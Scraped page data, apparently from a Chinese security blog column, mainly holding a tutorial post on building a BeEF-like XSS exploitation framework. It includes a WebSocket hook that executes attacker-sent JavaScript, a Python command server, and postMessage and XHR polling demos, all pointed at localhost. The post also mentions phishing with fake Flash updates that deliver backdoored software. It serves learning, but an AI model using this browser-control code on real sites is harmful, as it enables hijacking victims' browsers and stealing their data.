，我将和大家聊聊如何系统的学习插画与涂鸦，以及零基础选手怎样入门插画和涂鸦。经常在知乎、微博、贴吧看到有朋友在我发布的作品下面留言：「你画的太酷了，我也想学习，能不能教教我？」，每每及此，我都想系统的和对方聊聊画涂鸦或者插画的心得，但总是受限于很多因素不能很好地解答，所以，借此机会分享一些关于画插画和涂鸦的方法。\nlive主要内容：*零基础怎样开始画涂鸦？*画插画有哪些实用的技巧？*我想系统的学习画涂鸦，我该怎样做？*想要成为一名职业涂鸦插画师，我需要做什么？*一个不以画画为职业的人，画画能带来什么？*关于涂鸦和插画的其他相关问题live通道入口：适合人群：本次live，我想分享给所有喜欢画涂鸦和插画但是缺乏经验的朋友们，以及想要系统提升自己插画或者涂鸦技法的人，无论你是职业的还是业余的，无论你是想要增加自己的专业技能还是为生活增加一些乐趣。。。。欢迎大家来玩。live时间： 8:30","state":"published","sourceUrl":"","pageCommentsCount":0,"canComment":false,"snapshotUrl":"","slug":,"publishedTime":"T00:03:51+08:00","url":"/p/","title":"小鸟 的 Live －－ 如何画出炫酷的插画和涂鸦","summary":"几年前读了《黑客与画家》这本书，我是一名涂鸦插画师，也是一名白帽子黑客。“杰出、优秀、正直、有底线的优秀人才，比如Hackers，他们不服从管教，不愿意委身于社会大环境的潮水之中而无法辨别方向。然而，很自负的人必须培养出敏锐的感觉，及时发现周围…","reviewingCommentsCount":0,"meta":{"previous":null,"next":null},"commentPermission":"anyone","commentsCount":0,"likesCount":0},"next":{"isTitleImageFullScreen":true,"rating":"none","titleImage":"/v2-48b03cca28b025c95de464d6abf9abf3_r.jpg","links":{"comments":"/api/posts//comments"},"topics":[{"url":"/topic/","id":"","name":"黑客 (Hacker)"},{"url":"/topic/","id":"","name":"网络安全"},{"url":"/topic/","id":"","name":"XSS"}],"href":"/api/posts/","excerptTitle":"","author":{"profileUrl":"/people/zhang-peng-87-6-42","bio":"侠","hash":"097caab061c6ade54fa086a","uid":68,"isOrg":false,"description":"听说《源泉》是一本能甄别soulmate的书\n微博：迦持涂鸦","isOrgWhiteList":false,"slug":"zhang-peng-87-6-42","avatar":{"id":"v2-ad45b2e50d8fff9a1fdecb","template":"/{id}_{size}.jpg"},"name":"小鸟"},"column":{"slug":"c_","name":"白帽笔记"},"content":"作者：我的猪队友0x00 简述最近想练练手写一个类似beef的xss利用工具，找到一本神书 浏览器黑客handbook 其中引用了很多beef的源代码，做了很细致的讲解。假设现在目标页面已经发现了xss漏洞，我们要对它进行控制和进一步的利用，最好还能像后门一样持久保存在用户浏览器中关于xss利用：* 信息收集方面： 目标IP 浏览器 操作系统，可以从http头中读取
； 访问的历史记录 ，准备一堆常用网站，读取CSS 访问过的网站会有标记
；* 钓鱼欺骗 ： 用一个flash更新图片铺满页面，点击下载带后门的软件；克隆目标正在访问的其他网站* 实时控制 ： 攻击者建立服务和目标浏览器建立器实时的交互，发送任意命令给目标浏览器，这也是本文主要针对的方面： XMLHttpRequest 轮询目标状态， 原生支持的websocket ，跨域的postMessage() ，隐蔽一些的 DNS tunnel ，beef中有一个dns服务器。还有webrtc的技术感觉可以做更多的事情，可以访问摄像头还能建立稳定的数据连接。0x01 websocketspython3中引入websockets库 发现demo中使用了 async和await
async 用来声明一个协程函数
表示运行阻塞等待结果，python3.5中引入了协程关于协程的理解： 1. 区别于通常的函数调用，函数之间没有相互调用的关系2. 在同一线程中并行执行两个函数，在子程序内部可中断转而执行其他函数，不需要考虑线程之间的共享资源，锁，等等概念。3. 执行速度好于线程。websocket.jsfunction hasWebsocket(){\n\n
return !!window.WebSocket || !!window.MozWebS\n\n}\n\nif (hasWebsocket()){\n\n
var ws = new WebSocket(\"ws://127.0.0.1:5678/\");\n\n
catch(err){\n\n
console.log(\"no WebSocket server \") \n\n
ws.onopen = function(){\n\n
console.log(\"socket open\");\n\n
ws.send(\"give me some command\");\n\n
ws.onmessage = function(msg){\n\n
f = new Function(msg.data);\n\n
console.log(\"command executed\")\n\n
}\n\n}\n\nelse{\n\n
console.log(\"no WebSocket\")\n\n}\nxss_websocket.py#!/usr/bin/env python\n\nimport asyncio\n\nimport datetime\n\nimport random\n\nimport websockets\n\n\n\nasync def command(websocket,path):\n\n
while True:\n\n
payload = input(\"enter command&\")\n\n
if payload:\n\n
await websocket.send(payload)\n\n
print(\"waiting for command\")\n\n#
await asyncio.sleep(10)\n\n\n\nstart_server = websockets.serve(command, '127.0.0.1', 5678)\n\nasyncio.get_event_loop().run_until_complete(start_server)\n\nasyncio.get_event_loop().run_forever()\n执行结果是这样的 可以输入js命令让目标执行 0x02 PostMessagewindow.postMessage() 是另一个原生支持的跨域交流的方法。我们先修改/etc/hosts建立两个域名 需要在victim页面建立一个iframe 通过postMessage()向 传送消息在hack.html中监听发送过来的消息victim.html &!DOCTYPE html&\n\n&html&\n\n&head&\n\n
&title&&/title&\n\n
&script type=\"text/javascript\"&\n\n
window.addEventListener(\"message\",receiveMessage,false);\n\n
var infoBar = document.getElementById(\"debug\")\n\n
function receiveMessage(event){\n\n
infoBar.innerHTML += event.origin+\": \"+event.data+\"\";\n\n
new Function(event.data)();\n\n
function post_msg(){\n\n
var to_hack = document.getElementById('to_hack');\n\n
to_hack.contentWindow.postMessage(\"\"+eval(document.getElementById('v').value),\"\");\n\n
&/script&\n\n&/head&\n\n&body&\n\n
&div id=\"debug\"&&/div&\n\n
&div id=\"ui\"&\n\n
&input type=\"text\" name=\"\" id=\"v\" /&\n\n
&input type=\"button\" value=\"send to hacker\" onclick=\"post_msg()\"&\n\n
&iframe id=\"to_hack\" src=\"/hack/xss/hack.html\"&&/iframe&\n\n
&/div&\n\n&/body&\n\n&/html&\nhack.html&!DOCTYPE html&\n\n&html&\n\n
&head&\n\n
&title&WebSocket demo&/title&\n\n
&/head&\n\n
&body&\n\n
&div id=\"debug\"& Ready to receive data...&/div&\n\n
&input type=\"hidden\" id=\"payload\" value=\"alert(1)\"& \n\n
&script type=\"text/javascript\"&\n\n
window.addEventListener(\"message\",receiveMessage, false);\n\n
var debug = document.getElementById(\"debug\");\n\n\n\n
var payload = eval(document.getElementById('payload').value)\n\n
console.log(payload)\n\n
function receiveMessage(event){\n\n
debug.innerHTML += \"Data: \" + event.data + \"\\n Orign: \"+event.\n\n
parent.postMessage(payload,event.orign);\n\n
&/script&\n\n
&/body&\n\n&/html&\n0x03 XMLhttpRequest我们编写一个tronado 的hello world 服务器来给xmlHttpRequest响应。然而XHR受同源策略的限制只能发出请求而不能收回自己请求结果。\n在XHR level2 中只要在返回头中加上 Access-Control-Allow-Origin 头部 指定可以访问的源就能实现.xmlhttp.html&!DOCTYPE html&\n&html&\n&head&\n\t&title&&/title&\n&/head&\n&body&\n\t&script type=\"text/javascript\"&\n\n\t\tfunction loadXMLDoc(){\n\t\t\tvar xmlhttp=\n\t\t\tif (window.XMLHttpRequest){\n\t\t\t
xmlhttp=new XMLHttpRequest();\n\t\t\t
}\n\t\t\telse if (window.ActiveXObject){\n\t\t\t
xmlhttp=new ActiveXObject(\"Microsoft.XMLHTTP\");\n\t\t\t
}\n\t\t\telse{\n\t\t\t
alert(\"Your browser does not support XMLHTTP.\");\n\t\t\t
}\n\t\t\\n\t\t}\n\n\t\tvar xmlhttp=loadXMLDoc();\n\n\t\tfunction Makerequest(url){\n\t\t\tif (xmlhttp!=null){\n\t\t\t
xmlhttp.onreadystatechange=state_C\n\t\t\t
xmlhttp.open(\"GET\",url,true);\n\t\t\t
xmlhttp.send(null);\n\t\t\t
}\n\t\t}\n\n\t\tfunction state_Change()\n\t\t{\n\t\tif (xmlhttp.readyState==4){\n\t\t
if(xmlhttp.responseText!=null){\n\t\t
\t//new Function(xmlhttp.responseText).();\n\t\t
\tdocument.write(xmlhttp.responseText)\n\t\t
else{\n\t\t
\tconsole.log(\"responseText wrong\")\n\t\t
}\n\t\telse{\n\t\t\tconsole.log(\"readyState wrong\")\n\t\t}\n\t\t}\n\t\tsetInterval(Makerequest(\"http://localhost:8001\"),2000)\n\t\t\n\t&/script&\n&/body&\n&/html&\n hello_world.pyimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nimport os\n\nfrom tornado.options import define ,options\ndefine(\"port\",default=8001,help=\"run on this port \" ,type=int)\n\nclass IndexHandler(tornado.web.RequestHandler):\n\tdef get(self):\n\t\tself.write(\"&script&alert(1)&/script&\")\n#就在这里设置返回头\n
self.set_header('Access-Control-Allow-Origin','*') \n\nif __name__==\"__main__\":\n\ttornado.options.parse_command_line()\n\tapp = tornado.web.Application(handlers=[(r\"/\",IndexHandler)],\n\t\ttemplate_path=os.path.join(os.path.dirname(__file__), \"templates\"))\n\thttp_server = tornado.httpserver.HTTPServer(app)\n\thttp_server.listen(options.port)\n\ttornado.ioloop.IOLoop.instance().start()\n没设置返回头的就会显示这样最后结果当然是又弹窗了本文中的代码都是简单的demo
好像一口气写了好多helloworld出来。给自己挖的坑太多，填好一个是一个。0x04 参考1，讲解了postmessage和websocket的概念2，介绍python协程3，websocket 文档4，《Browser hacker‘s handbook》","state":"published","sourceUrl":"","pageCommentsCount":0,"canComment":false,"snapshotUrl":"","slug":,"publishedTime":"T23:08:44+08:00","url":"/p/","title":"XSS框架（一）浏览器和服务器通信","summary":"作者：我的猪队友 0x00 简述 最近想练练手写一个类似beef的xss利用工具，找到一本神书 浏览器黑客handbook 其中引用了很多beef的源代码，做了很细致的讲解。 假设现在目标页面已经发现了xss漏洞，我们要对它进行控制和进一步的利用，最好还能…","reviewingCommentsCount":0,"meta":{"previous":null,"next":null},"commentPermission":"anyone","commentsCount":0,"likesCount":0}},"commentsCount":43,"likesCount":454,"FULLINFO":true}},"User":{"zhang-peng-87-6-42":{"isFollowed":false,"name":"小鸟","headline":"听说《源泉》是一本能甄别soulmate的书\n微博：迦持涂鸦","avatarUrl":"/v2-ad45b2e50d8fff9a1fdecb_s.jpg","isFollowing":false,"type":"people","slug":"zhang-peng-87-6-42","bio":"侠","hash":"097caab061c6ade54fa086a","uid":68,"isOrg":false,"description":"听说《源泉》是一本能甄别soulmate的书\n微博：迦持涂鸦","profileUrl":"/people/zhang-peng-87-6-42","avatar":{"id":"v2-ad45b2e50d8fff9a1fdecb","template":"/{id}_{size}.jpg"},"isOrgWhiteList":false,"badge":{"identity":null,"bestAnswerer":null}}},"Comment":{},"favlists":{}},"me":{},"global":{},"columns":{"c_":{"following":false,"canManage":false,"href":"/api/columns/c_","name":"白帽笔记","creator":{"slug":"zhang-peng-87-6-42"},"url":"/c_","slug":"c_","avatar":{"id":"v2-7dffa97fa94bafc5e959bcfe6a3c0b72","template":"/{id}_{size}.jpg"}}},"columnPosts":{},"postComments":{},"postReviewComments":{"comments":[],"newComments":[],"hasMore":true},"favlistsByUser":{},"favlistRelations":{},"promotions":{},"env":{"isAppView":false,"appViewConfig":{"content_padding_top":128,"content_padding_bottom":56,"content_padding_left":16,"content_padding_right":16,"title_font_size":22,"body_font_size":16,"is_dark_theme":false,"can_auto_load_image":true,"app_info":"OS=iOS"}},"sys":{}}}